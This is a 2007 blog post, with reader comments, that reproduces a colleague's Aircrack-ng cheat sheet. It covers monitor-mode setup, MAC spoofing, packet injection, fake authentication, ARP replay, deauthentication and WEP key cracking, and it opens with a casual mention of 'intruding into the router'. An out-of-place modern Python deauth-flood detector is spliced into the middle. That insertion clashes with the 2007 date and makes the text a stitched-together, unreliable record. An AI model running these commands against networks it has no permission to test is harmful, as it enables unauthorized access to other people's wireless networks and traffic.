Thursday, November 1, 2007

Hacking and Cracking Wireless

One day after intruding into the router, I remembered my colleague Mark had compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands; it comes in very handy when doing a wireless audit and saves you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel


NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel:
iwconfig ath0 channel n
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up

use macchanger instead

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9
===================
D-Link DWL-G122

aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure both cards are on the same channel (channel hopping does not work on the D-Link DWL-G122???); check with:
iwlist channel (to find out the current channel set)

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================



########################################################




PACKET CAPTURE:

airodump-ng device (first find the BSSID and channel you are interested in)

Then capture packets on that particular channel:

airodump-ng --channel --bssid -w dumpfile device (ath0/rausb0)

Notes: capture full packets when using PTW attack (don't dump ivs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools



############################################################

ATTACKS

You may want to associate to the AP first using fake authentication before any test:
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association:
aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0




ARP replay (for wep cracking PTW method):
if RXQ in the airodump window is > 90 then #/s should be 200+ (watch #Data, it counts the captured IVs)

aireplay-ng --arpreplay -b -h device

Deauthentication (to capture a WPA handshake or reveal a hidden SSID)
Fake Authentication (to authenticate to the AP in case it is needed before we can inject)
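As an added defender-side example (not part of Mark's list): the deauthentication frames the note above relies on stand out in a monitor-mode capture, because a client leaving sends one deauth while an injected flood sends hundreds, usually with the AP's own address as transmitter. The script parses raw 802.11 frames (radiotap header already stripped, an assumption) and flags transmitter/BSSID pairs over a threshold; the frames are constructed inline using the MAC addresses quoted on this page.

```python
import struct
from collections import Counter

# Constructed sample input: raw 802.11 frames with the radiotap header already
# stripped (an assumption). MACs are the ones quoted on the page.
AP_BSSID = bytes.fromhex("001a6df840d0")
CLIENT = bytes.fromhex("06146c4cb97c")
BROADCAST = b"\xff" * 6

def build_frame(fc0, addr1, addr2, addr3, body=b""):
    """Minimal 802.11 frame: frame control, duration, addr1-3, seq ctrl, body."""
    return bytes([fc0, 0x00]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body

def deauth_frame(src, dst, bssid, reason):
    """Management frame (type 0), subtype 12 = deauthentication -> FC byte 0 = 0xC0."""
    return build_frame(0xC0, dst, src, bssid, struct.pack("<H", reason))

def parse_frame(frame):
    """Return (type, subtype, addr1, addr2, addr3) from a raw 802.11 frame."""
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3      # bits 2-3: 0 = management, 1 = control, 2 = data
    subtype = (fc0 >> 4) & 0xF    # bits 4-7
    return ftype, subtype, frame[4:10], frame[10:16], frame[16:22]

def find_deauth_floods(frames, threshold=10):
    """Count deauth frames per (transmitter, BSSID) pair and return the pairs
    at or above threshold. A client leaving sends one; an injected flood sends
    many, usually with the AP's own address as the transmitter."""
    counts = Counter()
    for f in frames:
        ftype, subtype, _, addr2, addr3 = parse_frame(f)
        if ftype == 0 and subtype == 12:
            counts[(addr2.hex(":"), addr3.hex(":"))] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}

# Constructed capture: a few beacons, one genuine client deauth (reason 3,
# "station is leaving"), then a burst of 64 deauths spoofing the AP to broadcast.
SAMPLE_FRAMES = (
    [build_frame(0x80, BROADCAST, AP_BSSID, AP_BSSID)] * 5
    + [deauth_frame(CLIENT, AP_BSSID, AP_BSSID, reason=3)]
    + [deauth_frame(AP_BSSID, BROADCAST, AP_BSSID, reason=7) for _ in range(64)]
)

if __name__ == "__main__":
    for (tx, bssid), n in find_deauth_floods(SAMPLE_FRAMES).items():
        print(f"deauth flood: {n} frames from {tx} on BSSID {bssid}")
```

On a real capture, feed the frames from a pcap reader after stripping the radiotap header and run the counter per time window rather than over the whole file.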



#############################################################
WEP CRACKING

Using the PTW attack (version 0.9+ only). Packets must be ARP (from arp-replay).

aircrack-ng -z -b dumpfile*.cap
Packets needed (approximately):
40-bit = 20,000
104-bit = 40,000

Normal Attack
-n 64 (test if 40-bit WEP); remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.


#######################################################

Increasing injection Speed

iwconfig device rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man

14 comments:

Anonymous said...

Have you personally tried those commands in pentesting? YES or NO?

Are you using the 'aircrack-ng suite' in MS Windows or Linux? or a VM in Windows? or Live-CD/USB?

Have you tried Auditor/Backtrack/Backtrack2/CoWAPPty with success in wireless pentesting??

Do you agree any 'Certified IT' programme will not accept a 'typo error' especially in a 'Command'?

I'm just curious and all this brings me to what tools you used in your earlier post regarding gaining access to a router, and how you did it too?

Are you using CommView for WiFi/Cain & Abel/Wireshark?

matato said...

Hi there.. Mark here. Thanks for acknowledging me dude. Here's my response to the previous post. The commands I have noted are not a step-by-step walkthrough on wireless pentesting. I got everything working on my

matato said...

here's the link to my blog.. http://matat0.blogspot.com

Cracking Man said...

Hi, thanks. I tried it and the rt73 is a very good chipset; it supports injection. I can get the key in around 3 minutes with Windows+VMware. Just find the tutorial here: Tutorial Cracking WEP In 3 Minute

Anonymous said...

When you "copy paste" a cracking tutorial, for your own sake please at least try it first. The guy before already pointed out your error, a typo in the command, yet you still didn't find it? What a great certified hacker.
